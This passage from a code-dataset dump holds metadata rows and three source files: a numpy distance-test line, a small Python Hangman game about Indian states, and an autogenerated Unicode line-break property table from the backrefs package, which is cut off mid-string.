np.testing.assert_almost_equal(euclidean(x_mat, y_mat), result, decimal=3)
| 31.580645
| 80
| 0.485529
| 371
| 2,937
| 3.706199
| 0.137466
| 0.139636
| 0.244364
| 0.163636
| 0.861091
| 0.859636
| 0.821818
| 0.791273
| 0.791273
| 0.791273
| 0
| 0.122059
| 0.305414
| 2,937
| 92
| 81
| 31.923913
| 0.551961
| 0
| 0
| 0.576471
| 0
| 0
| 0.07763
| 0
| 0
| 0
| 0
| 0
| 0.035294
| 1
| 0.035294
| false
| 0
| 0.047059
| 0
| 0.082353
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
db4193464719ae1b9697cb21dad8ef4dcda8e032
| 863
|
py
|
Python
|
Hangman.py
|
VikashK21/Hangman_Game_List
|
3334c90ffc58cf59225222a45d561bd3f0b3fc60
|
[
"MIT"
] | 1
|
2021-08-19T13:23:12.000Z
|
2021-08-19T13:23:12.000Z
|
Hangman.py
|
VikashK21/Hangman_Game_List
|
3334c90ffc58cf59225222a45d561bd3f0b3fc60
|
[
"MIT"
] | null | null | null |
Hangman.py
|
VikashK21/Hangman_Game_List
|
3334c90ffc58cf59225222a45d561bd3f0b3fc60
|
[
"MIT"
] | null | null | null |
n=0
a=["RAJASTHAN"]
b=["+------+\n|\n|\n|\n|\n|\n|\n|\n|______\n","\n+------+\n| |\n| O\n|\n|\n|\n|\n|\n|\n|______","\n+------+\n| |\n| O\n| |\n| |\n|\n|\n|\n|\n|______","\n+------+\n| |\n| O\n| /| \n| |\n|\n|\n|\n|\n|______","\n+------+\n| |\n| O\n| /|\ \n| |\n|\n|\n|\n|\n|______","\n+------+\n| |\n| O\n| /|\ \n| |\n| /\n|\n|\n|\n|______","\n+------+\n| |\n| O\n| /|\ \n| |\n| / \ \n|\n|\n|______"]
print(" **HANGMAN**\n\nGuess a state of India.\n")
while n<=6:
choice=input("Enter a state name: ")
if choice in list(a):
print('\nYou Won the Game.')
break
elif choice not in list(a):
print(b[n])
if n==6:
print('\nSorry You lost the Game.')
n+=1
| 57.533333
| 522
| 0.338355
| 128
| 863
| 1.953125
| 0.25
| 0.488
| 0.648
| 0.752
| 0.296
| 0.296
| 0.296
| 0.296
| 0.296
| 0.296
| 0
| 0.006897
| 0.327926
| 863
| 14
| 523
| 61.642857
| 0.424138
| 0
| 0
| 0
| 0
| 0.428571
| 0.706837
| 0.155272
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.285714
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db50f670015bf1910b93179006d4f0772dd0176b
| 67,573
|
py
|
Python
|
Sublime Text 3/Packages/backrefs/st3/backrefs/uniprops/unidata/linebreak.py
|
anekeallen/Sublime-Text-3
|
8502b9089ca4223f8ba7ff168626a0dbe67713cb
|
[
"MIT"
] | 7
|
2016-01-20T01:44:36.000Z
|
2019-01-29T11:52:39.000Z
|
Sublime Text 3/Packages/backrefs/st3/backrefs/uniprops/unidata/linebreak.py
|
anekeallen/Sublime-Text-3
|
8502b9089ca4223f8ba7ff168626a0dbe67713cb
|
[
"MIT"
] | 4
|
2016-01-27T17:42:07.000Z
|
2021-08-13T12:31:25.000Z
|
Sublime Text 3/Packages/backrefs/st3/backrefs/uniprops/unidata/linebreak.py
|
anekeallen/Sublime-Text-3
|
8502b9089ca4223f8ba7ff168626a0dbe67713cb
|
[
"MIT"
] | 2
|
2015-11-15T09:11:34.000Z
|
2019-01-29T11:52:41.000Z
|
"""Unicode Properties from Unicode version 6.1.0 (autogen)."""
unicode_line_break = {
"^ai": "\x00-\xa6\xa9\xab-\xb1\xb4-\xb5\xbb\xbf-\xd6\xd8-\xf6\xf8-\u02c6\u02c8\u02cc\u02ce-\u02cf\u02d1-\u02d7\u02dc\u02de-\u2014\u2017-\u201f\u2022-\u203a\u203c-\u2073\u2075-\u207e\u2080\u2085-\u2104\u2106-\u2112\u2114-\u2120\u2123-\u212a\u212c-\u2153\u2156-\u215a\u215c-\u215d\u215f\u216c-\u216f\u217a-\u2188\u218a-\u218f\u219a-\u21d1\u21d3\u21d5-\u21ff\u2201\u2204-\u2206\u2209-\u220a\u220c-\u220e\u2210\u2212-\u2214\u2216-\u2219\u221b-\u221c\u2221-\u2222\u2224\u2226\u222d\u222f-\u2233\u2238-\u223b\u223e-\u2247\u2249-\u224b\u224d-\u2251\u2253-\u225f\u2262-\u2263\u2268-\u2269\u226c-\u226d\u2270-\u2281\u2284-\u2285\u2288-\u2294\u2296-\u2298\u229a-\u22a4\u22a6-\u22be\u22c0-\u2311\u2313-\u245f\u24ff\u254c-\u254f\u2575-\u257f\u2590-\u2591\u2596-\u259f\u25a2\u25aa-\u25b1\u25b4-\u25b5\u25b8-\u25bb\u25be-\u25bf\u25c2-\u25c5\u25c9-\u25ca\u25cc-\u25cd\u25d2-\u25e1\u25e6-\u25ee\u25f0-\u2604\u2607-\u2608\u260a-\u260d\u2610-\u2613\u2618-\u261b\u261d\u261f-\u263f\u2641\u2643-\u265f\u2662\u2666\u266b\u266e\u2670-\u269d\u26a0-\u26bd\u26c0-\u26c3\u26ce\u26e2\u26e4-\u26e7\u2700-\u2756\u2758-\u2775\u2794-\u2b54\u2b5a-\u3247\u3250-\ufffc\ufffe-\U0001f0ff\U0001f10b-\U0001f10f\U0001f12e-\U0001f12f\U0001f16a-\U0001f16f\U0001f19b-\U0010ffff",
"^al": "\x00-\x22\x24-\x25\x27-\x29\x2b-\x3b\x3f\x5c\x5b-\x5c\x5d\x7b-\x7d\x7f-\xa5\xa7-\xa8\xaa-\xab\xad\xb0-\xb4\xb6-\xbf\xd7\xf7\u02c7-\u02cd\u02d0\u02d8-\u02db\u02dd\u02df\u0300-\u036f\u0378-\u0379\u037e-\u0383\u038b\u038d\u03a2\u0483-\u0489\u0528-\u0530\u0557-\u0558\u0560\u0588-\u05bf\u05c1-\u05c2\u05c4-\u05f2\u05f5-\u05ff\u0605\u0609-\u060d\u0610-\u061f\u064b-\u066c\u0670\u06d4\u06d6-\u06dc\u06df-\u06e4\u06e7-\u06e8\u06ea-\u06ed\u06f0-\u06f9\u070e\u0711\u0730-\u074c\u07a6-\u07b0\u07b2-\u07c9\u07eb-\u07f3\u07f8-\u07f9\u07fb-\u07ff\u0816-\u0819\u081b-\u0823\u0825-\u0827\u0829-\u082f\u083f\u0859-\u085d\u085f-\u089f\u08a1\u08ad-\u0903\u093a-\u093c\u093e-\u094f\u0951-\u0957\u0962-\u096f\u0978\u0980-\u0984\u098d-\u098e\u0991-\u0992\u09a9\u09b1\u09b3-\u09b5\u09ba-\u09bc\u09be-\u09cd\u09cf-\u09db\u09de\u09e2-\u09ef\u09f2-\u09f3\u09f9\u09fb-\u0a04\u0a0b-\u0a0e\u0a11-\u0a12\u0a29\u0a31\u0a34\u0a37\u0a3a-\u0a58\u0a5d\u0a5f-\u0a71\u0a75-\u0a84\u0a8e\u0a92\u0aa9\u0ab1\u0ab4\u0aba-\u0abc\u0abe-\u0acf\u0ad1-\u0adf\u0ae2-\u0aef\u0af1-\u0b04\u0b0d-\u0b0e\u0b11-\u0b12\u0b29\u0b31\u0b34\u0b3a-\u0b3c\u0b3e-\u0b5b\u0b5e\u0b62-\u0b6f\u0b78-\u0b82\u0b84\u0b8b-\u0b8d\u0b91\u0b96-\u0b98\u0b9b\u0b9d\u0ba0-\u0ba2\u0ba5-\u0ba7\u0bab-\u0bad\u0bba-\u0bcf\u0bd1-\u0bef\u0bf9\u0bfb-\u0c04\u0c0d\u0c11\u0c29\u0c34\u0c3a-\u0c3c\u0c3e-\u0c57\u0c5a-\u0c5f\u0c62-\u0c77\u0c80-\u0c84\u0c8d\u0c91\u0ca9\u0cb4\u0cba-\u0cbc\u0cbe-\u0cdd\u0cdf\u0ce2-\u0cf0\u0cf3-\u0d04\u0d0d\u0d11\u0d3b-\u0d3c\u0d3e-\u0d4d\u0d4f-\u0d5f\u0d62-\u0d6f\u0d76-\u0d79\u0d80-\u0d84\u0d97-\u0d99\u0db2\u0dbc\u0dbe-\u0dbf\u0dc7-\u0df3\u0df5-\u0e4e\u0e50-\u0eff\u0f01-\u0f04\u0f06-\u0f12\u0f14\u0f18-\u0f19\u0f20-\u0f29\u0f34-\u0f35\u0f37\u0f39-\u0f3f\u0f48\u0f6d-\u0f87\u0f8d-\u0fbf\u0fc6\u0fcd\u0fd0-\u0fd3\u0fd9-\u104b\u1050-\u109f\u10c6\u10c8-\u10cc\u10ce-\u10cf\u1100-\u11ff\u1249\u124e-\u124f\u1257\u1259\u125e-\u125f\u1289\u128e-\u128f\u12b1\u12b6-\u12b7\u12bf\u12c1\u12c6-\u12c7\u12d7\u1311\u1316-\u1317\u135b-\u135f\u1361\u137d-\u137f\u139a-\u139f\u13f5-\u1400\u1680\u169b-\u169f\u16eb-\u16ed\u16f1-\u16ff\u170d\u1712-\u171f\u1732-\u173f\u1752-\u175f\u176d\u1771-\u17d8\u17da-\u17ef\u17fa-\u17ff\u1802-\u1806\u1808-\u1809\u180b-\u181f\u1878-\u187f\u18a9\u18ab-\u18af\u18f6-\u18ff\u191d-\u193f\u1941-\u19df\u1a17-\u1a1d\u1a20-\u1b04\u1b34-\u1b44\u1b4c-\u1b5b\u1b5d-\u1b60\u1b6b-\u1b73\u1b7d-\u1b82\u1ba1-\u1bad\u1bb0-\u1bb9\u1be6-\u1bfb\u1c24-\u1c4c\u1c50-\u1c59\u1c7e-\u1cbf\u1cc8-\u1cd2\u1cd4-\u1ce8\u1ced\u1cf2-\u1cf4\u1cf7-\u1cff\u1dc0-\u1dff\u1f16-\u1f17\u1f1e-\u1f1f\u1f46-\u1f47\u1f4e-\u1f4f\u1f58\u1f5a\u1f5c\u1f5e\u1f7e-\u1f7f\u1fb5\u1fc5\u1fd4-\u1fd5\u1fdc\u1ff0-\u1ff1\u1ff5\u1ffd\u1fff-\u2016\u2018-\u2021\u2024-\u2037\u2039-\u203d\u2044-\u2049\u2056\u2058-\u205b\u205d-\u2060\u2065-\u206f\u2072-\u2074\u207d-\u207f\u2081-\u2084\u208d-\u208f\u209d-\u20ff\u2103\u2105\u2109\u2113\u2116\u2121-\u2122\u212b\u2154-\u2155\u215b\u215e\u2160-\u216b\u2170-\u2179\u2189-\u2199\u21d2\u21d4\u2200\u2202-\u2203\u2207-\u2208\u220b\u220f\u2211-\u2213\u2215\u221a\u221d-\u2220\u2223\u2225\u2227-\u222c\u222e\u2234-\u2237\u223c-\u223d\u2248\u224c\u2252\u2260-\u2261\u2264-\u2267\u226a-\u226b\u226e-\u226f\u2282-\u2283\u2286-\u2287\u2295\u2299\u22a5\u22bf\u2312\u2329-\u232a\u23f4-\u23ff\u2427-\u243f\u244b-\u24fe\u2500-\u254b\u2550-\u2574\u2580-\u258f\u2592-\u2595\u25a0-\u25a1\u25a3-\u25a9\u25b2-\u25b3\u25b6-\u25b7\u25bc-\u25bd\u25c0-\u25c1\u25c6-\u25c8\u25cb\u25ce-\u25d1\u25e2-\u25e5\u25ef\u2605-\u2606\u2609\u260e-\u260f\u2614-\u2617\u261c\u261e\u2640\u2642\u2660-\u2661\u2663-\u2665\u2667-\u266a\u266c-\u266d\u266f\u269e-\u269f\u26be-\u26bf\u26c4-\u26cd\u26cf-\u26e1\u26e3\u26e8-\u2700\u2757\u275b-\u275e\u2762-\u2763\u2768-\u2793\u27c5-\u27c6\u27e6-\u27ef\u2983-\u2998\u29d8-\u29db\u29fc-\u29fd\u2b4d-\u2b4f\u2b55-\u2bff\u2c2f\u2c5f\u2cef-\u2cf1\u2cf4-\u2cfc\u2cfe-\u2cff\u2d26\u2d28-\u2d2c\u2d2e-\u2d2f\u2d68-\u2d6e\u2d70-\u2d7f\u2d97-\u2d9f\u2da7\u2daf\u2db7\u2dbf\u2dc7\u2dcf\u2dd7\u2ddf-\u2e15\u2e17-\u2e19\u2e1c-\u2e1d\u2e20-\u2e2e\u2e30-\u2e31\u2e33-\u2e34\u2e3a-\u4dbf\u4e00-\ua4cf\ua4fe-\ua4ff\ua60d-\ua60f\ua620-\ua629\ua62c-\ua63f\ua66f-\ua672\ua674-\ua67d\ua698-\ua69f\ua6f0-\ua6f1\ua6f3-\ua6ff\ua78f\ua794-\ua79f\ua7ab-\ua7f7\ua802\ua806\ua80b\ua823-\ua827\ua82c-\ua82f\ua838\ua83a-\ua83f\ua874-\ua881\ua8b4-\ua8f1\ua8fc-\ua909\ua926-\ua92f\ua947-\ua95e\ua960-\ua983\ua9b3-\ua9c0\ua9c7-\ua9c9\ua9ce\ua9d0-\ua9dd\ua9e0-\ua9ff\uaa29-\uaa3f\uaa43\uaa4c-\uaa5b\uaa5d-\uaadf\uaaeb-\uaaf1\uaaf5-\uab00\uab07-\uab08\uab0f-\uab10\uab17-\uab1f\uab27\uab2f-\uabbf\uabe3-\ufaff\ufb07-\ufb12\ufb18-\ufb28\ufb2a-\ufb4f\ufbc2-\ufbd2\ufd3e-\ufd4f\ufd90-\ufd91\ufdc8-\ufdef\ufdfc\ufdfe-\ufe6f\ufe75\ufefd-\uff65\uff67-\uff70\uff9e-\uff9f\uffbf-\uffc1\uffc8-\uffc9\uffd0-\uffd1\uffd8-\uffd9\uffdd-\uffe7\uffef-\uffff\U0001000c\U00010027\U0001003b\U0001003e\U0001004e-\U0001004f\U0001005e-\U0001007f\U000100fb-\U00010106\U00010134-\U00010136\U0001018b-\U0001018f\U0001019c-\U000101cf\U000101fd-\U0001027f\U0001029d-\U0001029f\U000102d1-\U000102ff\U0001031f\U00010324-\U0001032f\U0001034b-\U0001037f\U0001039e-\U0001039f\U000103c4-\U000103c7\U000103d0\U000103d6-\U000103ff\U0001049e-\U000107ff\U00010806-\U00010807\U00010809\U00010836\U00010839-\U0001083b\U0001083d-\U0001083e\U00010856-\U00010857\U00010860-\U000108ff\U0001091c-\U0001091f\U0001093a-\U0001093e\U00010940-\U0001097f\U000109b8-\U000109bd\U000109c0-\U000109ff\U00010a01-\U00010a0f\U00010a14\U00010a18\U00010a34-\U00010a3f\U00010a48-\U00010a57\U00010a59-\U00010a5f\U00010a80-\U00010aff\U00010b36-\U00010b3f\U00010b56-\U00010b57\U00010b73-\U00010b77\U00010b80-\U00010bff\U00010c49-\U00010e5f\U00010e7f-\U00011002\U00011038-\U00011048\U0001104e-\U00011051\U00011066-\U00011082\U000110b0-\U000110ba\U000110be-\U000110cf\U000110e9-\U00011102\U00011127-\U00011182\U000111b3-\U000111c0\U000111c5-\U000111c6\U000111c8-\U0001167f\U000116ab-\U00011fff\U0001236f-\U000123ff\U00012463-\U00012fff\U00013258-\U0001325d\U00013282\U00013286-\U00013289\U00013379-\U0001337b\U0001342f-\U000167ff\U00016a39-\U00016eff\U00016f45-\U00016f4f\U00016f51-\U00016f92\U00016fa0-\U0001cfff\U0001d0f6-\U0001d0ff\U0001d127-\U0001d128\U0001d165-\U0001d169\U0001d16d-\U0001d182\U0001d185-\U0001d18b\U0001d1aa-\U0001d1ad\U0001d1de-\U0001d1ff\U0001d242-\U0001d244\U0001d246-\U0001d2ff\U0001d357-\U0001d35f\U0001d372-\U0001d3ff\U0001d455\U0001d49d\U0001d4a0-\U0001d4a1\U0001d4a3-\U0001d4a4\U0001d4a7-\U0001d4a8\U0001d4ad\U0001d4ba\U0001d4bc\U0001d4c4\U0001d506\U0001d50b-\U0001d50c\U0001d515\U0001d51d\U0001d53a\U0001d53f\U0001d545\U0001d547-\U0001d549\U0001d551\U0001d6a6-\U0001d6a7\U0001d7cc-\U0001edff\U0001ee04\U0001ee20\U0001ee23\U0001ee25-\U0001ee26\U0001ee28\U0001ee33\U0001ee38\U0001ee3a\U0001ee3c-\U0001ee41\U0001ee43-\U0001ee46\U0001ee48\U0001ee4a\U0001ee4c\U0001ee50\U0001ee53\U0001ee55-\U0001ee56\U0001ee58\U0001ee5a\U0001ee5c\U0001ee5e\U0001ee60\U0001ee63\U0001ee65-\U0001ee66\U0001ee6b\U0001ee73\U0001ee78\U0001ee7d\U0001ee7f\U0001ee8a\U0001ee9c-\U0001eea0\U0001eea4\U0001eeaa\U0001eebc-\U0001eeef\U0001eef2-\U0001efff\U0001f02c-\U0001f02f\U0001f094-\U0001f09f\U0001f0af-\U0001f0b0\U0001f0bf-\U0001f0c0\U0001f0d0\U0001f0e0-\U0001f12d\U0001f12f-\U0001f169\U0001f16c-\U0001f1e5\U0001f200-\U0001f2ff\U0001f321-\U0001f32f\U0001f336\U0001f37d-\U0001f37f\U0001f394-\U0001f39f\U0001f3c5\U0001f3cb-\U0001f3df\U0001f3f1-\U0001f3ff\U0001f43f\U0001f441\U0001f4f8\U0001f4fd-\U0001f4ff\U0001f53e-\U0001f53f\U0001f544-\U0001f54f\U0001f568-\U0001f5fa\U0001f641-\U0001f644\U0001f650-\U0001f67f\U0001f6c6-\U0001f6ff\U0001f774-\U0010ffff",
"^b2": "\x00-\u2013\u2015-\u2e39\u2e3c-\U0010ffff",
"^ba": "\x00-\x08\x0a-\x7b\x7d-\xac\xae-\u0589\u058b-\u05bd\u05bf-\u0963\u0966-\u0e59\u0e5c-\u0f0a\u0f0c-\u0f33\u0f35-\u0f7e\u0f80-\u0f84\u0f86-\u0fbd\u0fc0-\u0fd1\u0fd3-\u1049\u104c-\u1360\u1362-\u13ff\u1401-\u167f\u1681-\u16ea\u16ee-\u1734\u1737-\u17d3\u17d6-\u17d7\u17d9\u17db-\u1803\u1806-\u1b59\u1b5c\u1b61-\u1c3a\u1c40-\u1c7d\u1c80-\u1fff\u2007\u200b-\u200f\u2011\u2014-\u2026\u2028-\u2055\u2057\u205c\u2060-\u2cf9\u2cfd-\u2cfe\u2d00-\u2d6f\u2d71-\u2e0d\u2e16\u2e18\u2e1a-\u2e29\u2e2e-\u2e2f\u2e32\u2e35-\ua4fd\ua500-\ua60c\ua60e\ua610-\ua6f2\ua6f8-\ua8cd\ua8d0-\ua92d\ua930-\ua9c6\ua9ca-\uaa5c\uaa60-\uaaef\uaaf2-\uabea\uabec-\U000100ff\U00010103-\U0001039e\U000103a0-\U000103cf\U000103d1-\U00010856\U00010858-\U0001091e\U00010920-\U00010a4f\U00010a58-\U00010b38\U00010b40-\U00011046\U00011049-\U000110bd\U000110c2-\U0001113f\U00011144-\U000111c4\U000111c7\U000111c9-\U0001246f\U00012474-\U0010ffff",
"^bb": "\x00-\xb3\xb5-\u02c7\u02c9-\u02cb\u02cd-\u02de\u02e0-\u0f00\u0f05\u0f08\u0f0b-\u0fcf\u0fd2\u0fd4-\u1805\u1807-\u1ffc\u1ffe-\ua873\ua876-\U0010ffff",
"^bk": "\x00-\x0a\x0d-\u2027\u202a-\U0010ffff",
"^cb": "\x00-\ufffb\ufffd-\U0010ffff",
"^cj": "\x00-\u3040\u3042\u3044\u3046\u3048\u304a-\u3062\u3064-\u3082\u3084\u3086\u3088-\u308d\u308f-\u3094\u3097-\u30a0\u30a2\u30a4\u30a6\u30a8\u30aa-\u30c2\u30c4-\u30e2\u30e4\u30e6\u30e8-\u30ed\u30ef-\u30f4\u30f7-\u30fb\u30fd-\u31ef\u3200-\uff66\uff71-\U0010ffff",
"^cl": "\x00-\x5c\x7c\x5c\x7e-\u0f3a\u0f3c\u0f3e-\u169b\u169d-\u2045\u2047-\u207d\u207f-\u208d\u208f-\u2329\u232b-\u2768\u276a\u276c\u276e\u2770\u2772\u2774\u2776-\u27c5\u27c7-\u27e6\u27e8\u27ea\u27ec\u27ee\u27f0-\u2983\u2985\u2987\u2989\u298b\u298d\u298f\u2991\u2993\u2995\u2997\u2999-\u29d8\u29da\u29dc-\u29fc\u29fe-\u2e22\u2e24\u2e26\u2e28\u2e2a-\u3000\u3003-\u3008\u300a\u300c\u300e\u3010\u3012-\u3014\u3016\u3018\u301a\u301c-\u301d\u3020-\ufd3e\ufd40-\ufe10\ufe13-\ufe17\ufe19-\ufe35\ufe37\ufe39\ufe3b\ufe3d\ufe3f\ufe41\ufe43\ufe45-\ufe47\ufe49-\ufe4f\ufe51\ufe53-\ufe59\ufe5b\ufe5d\ufe5f-\uff08\uff0a-\uff0b\uff0d\uff0f-\uff3c\uff3e-\uff5c\uff5e-\uff5f\uff62\uff65-\U0001325a\U0001325e-\U00013281\U00013283-\U00013286\U00013288\U0001328a-\U00013379\U0001337c-\U0010ffff",
"^cm": "\x09-\x0d\x20-\x5c\x7e\x85\xa0-\u02ff\u034f\u035c-\u0362\u0370-\u0482\u048a-\u0590\u05be\u05c0\u05c3\u05c6\u05c8-\u060f\u061b-\u064a\u0660-\u066f\u0671-\u06d5\u06dd-\u06de\u06e5-\u06e6\u06e9\u06ee-\u0710\u0712-\u072f\u074b-\u07a5\u07b1-\u07ea\u07f4-\u0815\u081a\u0824\u0828\u082e-\u0858\u085c-\u08e3\u08ff\u0904-\u0939\u093d\u0950\u0958-\u0961\u0964-\u0980\u0984-\u09bb\u09bd\u09c5-\u09c6\u09c9-\u09ca\u09ce-\u09d6\u09d8-\u09e1\u09e4-\u0a00\u0a04-\u0a3b\u0a3d\u0a43-\u0a46\u0a49-\u0a4a\u0a4e-\u0a50\u0a52-\u0a6f\u0a72-\u0a74\u0a76-\u0a80\u0a84-\u0abb\u0abd\u0ac6\u0aca\u0ace-\u0ae1\u0ae4-\u0b00\u0b04-\u0b3b\u0b3d\u0b45-\u0b46\u0b49-\u0b4a\u0b4e-\u0b55\u0b58-\u0b61\u0b64-\u0b81\u0b83-\u0bbd\u0bc3-\u0bc5\u0bc9\u0bce-\u0bd6\u0bd8-\u0c00\u0c04-\u0c3d\u0c45\u0c49\u0c4e-\u0c54\u0c57-\u0c61\u0c64-\u0c81\u0c84-\u0cbb\u0cbd\u0cc5\u0cc9\u0cce-\u0cd4\u0cd7-\u0ce1\u0ce4-\u0d01\u0d04-\u0d3d\u0d45\u0d49\u0d4e-\u0d56\u0d58-\u0d61\u0d64-\u0d81\u0d84-\u0dc9\u0dcb-\u0dce\u0dd5\u0dd7\u0de0-\u0df1\u0df4-\u0f17\u0f1a-\u0f34\u0f36\u0f38\u0f3a-\u0f3d\u0f40-\u0f70\u0f7f\u0f85\u0f88-\u0f8c\u0f98\u0fbd-\u0fc5\u0fc7-\u135c\u1360-\u1711\u1715-\u1731\u1735-\u1751\u1754-\u1771\u1774-\u180a\u180e-\u18a8\u18aa-\u191f\u192c-\u192f\u193c-\u1a16\u1a1c-\u1a7e\u1a80-\u1aff\u1b05-\u1b33\u1b45-\u1b6a\u1b74-\u1b7f\u1b83-\u1ba0\u1bae-\u1be5\u1bf4-\u1c23\u1c38-\u1ccf\u1cd3\u1ce9-\u1cec\u1cee-\u1cf1\u1cf5-\u1dbf\u1de7-\u1dfb\u1e00-\u200b\u2010-\u2029\u202f-\u2069\u2070-\u20cf\u20f1-\u2cee\u2cf2-\u2d7e\u2d80-\u2ddf\u2e00-\u3029\u3030-\u3098\u309b-\ua66e\ua673\ua67e-\ua69e\ua6a0-\ua6ef\ua6f2-\ua801\ua803-\ua805\ua807-\ua80a\ua80c-\ua822\ua828-\ua87f\ua882-\ua8b3\ua8c5-\ua8df\ua8f2-\ua925\ua92e-\ua946\ua954-\ua97f\ua984-\ua9b2\ua9c1-\uaa28\uaa37-\uaa42\uaa44-\uaa4b\uaa4e-\uaaea\uaaf0-\uaaf4\uaaf7-\uabe2\uabeb\uabee-\ufb1d\ufb1f-\ufdff\ufe10-\ufe1f\ufe27-\ufff8\ufffc-\U000101fc\U000101fe-\U00010a00\U00010a04\U00010a07-\U00010a0b\U00010a10-\U00010a37\U00010a3b-\U00010a3e\U00010a40-\U00010fff\U00011003-\U00011037\U00011047-\U0001107f\U00011083-\U000110af\U000110bb-\U000110ff\U00011103-\U00011126\U00011135-\U0001117f\U00011183-\U000111b2\U000111c1-\U000116aa\U000116b8-\U00016f50\U00016f7f-\U00016f8e\U00016f93-\U0001d164\U0001d16a-\U0001d16c\U0001d183-\U0001d184\U0001d18c-\U0001d1a9\U0001d1ae-\U0001d241\U0001d245-\U000e0000\U000e0002-\U000e001f\U000e0080-\U000e00ff\U000e01f0-\U0010ffff",
"^cp": "\x00-\x28\x2a-\x5c\x5c\x5c\x5e-\U0010ffff",
"^cr": "\x00-\x0c\x0e-\U0010ffff",
"^ex": "\x00-\x20\x22-\x3e\x40-\u05c5\u05c7-\u061a\u061c-\u061d\u0620-\u06d3\u06d5-\u07f8\u07fa-\u0f0c\u0f12-\u0f13\u0f15-\u1801\u1804-\u1807\u180a-\u1943\u1946-\u2761\u2764-\u2cf8\u2cfa-\u2cfd\u2cff-\u2e2d\u2e2f-\ua60d\ua60f-\ua875\ua878-\ufe14\ufe17-\ufe55\ufe58-\uff00\uff02-\uff1e\uff20-\U0010ffff",
"^gl": "\x00-\x9f\xa1-\u034e\u0350-\u035b\u0363-\u0f07\u0f09-\u0f0b\u0f0d-\u0f11\u0f13-\u0fd8\u0fdb-\u180d\u180f-\u2006\u2008-\u2010\u2012-\u202e\u2030-\U0010ffff",
"^h2": "\x00-\uabff\uac01-\uac1b\uac1d-\uac37\uac39-\uac53\uac55-\uac6f\uac71-\uac8b\uac8d-\uaca7\uaca9-\uacc3\uacc5-\uacdf\uace1-\uacfb\uacfd-\uad17\uad19-\uad33\uad35-\uad4f\uad51-\uad6b\uad6d-\uad87\uad89-\uada3\uada5-\uadbf\uadc1-\uaddb\uaddd-\uadf7\uadf9-\uae13\uae15-\uae2f\uae31-\uae4b\uae4d-\uae67\uae69-\uae83\uae85-\uae9f\uaea1-\uaebb\uaebd-\uaed7\uaed9-\uaef3\uaef5-\uaf0f\uaf11-\uaf2b\uaf2d-\uaf47\uaf49-\uaf63\uaf65-\uaf7f\uaf81-\uaf9b\uaf9d-\uafb7\uafb9-\uafd3\uafd5-\uafef\uaff1-\ub00b\ub00d-\ub027\ub029-\ub043\ub045-\ub05f\ub061-\ub07b\ub07d-\ub097\ub099-\ub0b3\ub0b5-\ub0cf\ub0d1-\ub0eb\ub0ed-\ub107\ub109-\ub123\ub125-\ub13f\ub141-\ub15b\ub15d-\ub177\ub179-\ub193\ub195-\ub1af\ub1b1-\ub1cb\ub1cd-\ub1e7\ub1e9-\ub203\ub205-\ub21f\ub221-\ub23b\ub23d-\ub257\ub259-\ub273\ub275-\ub28f\ub291-\ub2ab\ub2ad-\ub2c7\ub2c9-\ub2e3\ub2e5-\ub2ff\ub301-\ub31b\ub31d-\ub337\ub339-\ub353\ub355-\ub36f\ub371-\ub38b\ub38d-\ub3a7\ub3a9-\ub3c3\ub3c5-\ub3df\ub3e1-\ub3fb\ub3fd-\ub417\ub419-\ub433\ub435-\ub44f\ub451-\ub46b\ub46d-\ub487\ub489-\ub4a3\ub4a5-\ub4bf\ub4c1-\ub4db\ub4dd-\ub4f7\ub4f9-\ub513\ub515-\ub52f\ub531-\ub54b\ub54d-\ub567\ub569-\ub583\ub585-\ub59f\ub5a1-\ub5bb\ub5bd-\ub5d7\ub5d9-\ub5f3\ub5f5-\ub60f\ub611-\ub62b\ub62d-\ub647\ub649-\ub663\ub665-\ub67f\ub681-\ub69b\ub69d-\ub6b7\ub6b9-\ub6d3\ub6d5-\ub6ef\ub6f1-\ub70b\ub70d-\ub727\ub729-\ub743\ub745-\ub75f\ub761-\ub77b\ub77d-\ub797\ub799-\ub7b3\ub7b5-\ub7cf\ub7d1-\ub7eb\ub7ed-\ub807\ub809-\ub823\ub825-\ub83f\ub841-\ub85b\ub85d-\ub877\ub879-\ub893\ub895-\ub8af\ub8b1-\ub8cb\ub8cd-\ub8e7\ub8e9-\ub903\ub905-\ub91f\ub921-\ub93b\ub93d-\ub957\ub959-\ub973\ub975-\ub98f\ub991-\ub9ab\ub9ad-\ub9c7\ub9c9-\ub9e3\ub9e5-\ub9ff\uba01-\uba1b\uba1d-\uba37\uba39-\uba53\uba55-\uba6f\uba71-\uba8b\uba8d-\ubaa7\ubaa9-\ubac3\ubac5-\ubadf\ubae1-\ubafb\ubafd-\ubb17\ubb19-\ubb33\ubb35-\ubb4f\ubb51-\ubb6b\ubb6d-\ubb87\ubb89-\ubba3\ubba5-\ubbbf\ubbc1-\ubbdb\ubbdd-\ubbf7\ubbf9-\ubc13\ubc15-\ubc2f\ubc31-\ubc4b\ubc4d-\ubc67\ubc69-\ubc83\ubc85-\ubc9f\ubca1-\ubcbb\ubcbd-\ubcd7\ubcd9-\ubcf3\ubcf5-\ubd0f\ubd11-\ubd2b\ubd2d-\ubd47\ubd49-\ubd63\ubd65-\ubd7f\ubd81-\ubd9b\ubd9d-\ubdb7\ubdb9-\ubdd3\ubdd5-\ubdef\ubdf1-\ube0b\ube0d-\ube27\ube29-\ube43\ube45-\ube5f\ube61-\ube7b\ube7d-\ube97\ube99-\ubeb3\ubeb5-\ubecf\ubed1-\ubeeb\ubeed-\ubf07\ubf09-\ubf23\ubf25-\ubf3f\ubf41-\ubf5b\ubf5d-\ubf77\ubf79-\ubf93\ubf95-\ubfaf\ubfb1-\ubfcb\ubfcd-\ubfe7\ubfe9-\uc003\uc005-\uc01f\uc021-\uc03b\uc03d-\uc057\uc059-\uc073\uc075-\uc08f\uc091-\uc0ab\uc0ad-\uc0c7\uc0c9-\uc0e3\uc0e5-\uc0ff\uc101-\uc11b\uc11d-\uc137\uc139-\uc153\uc155-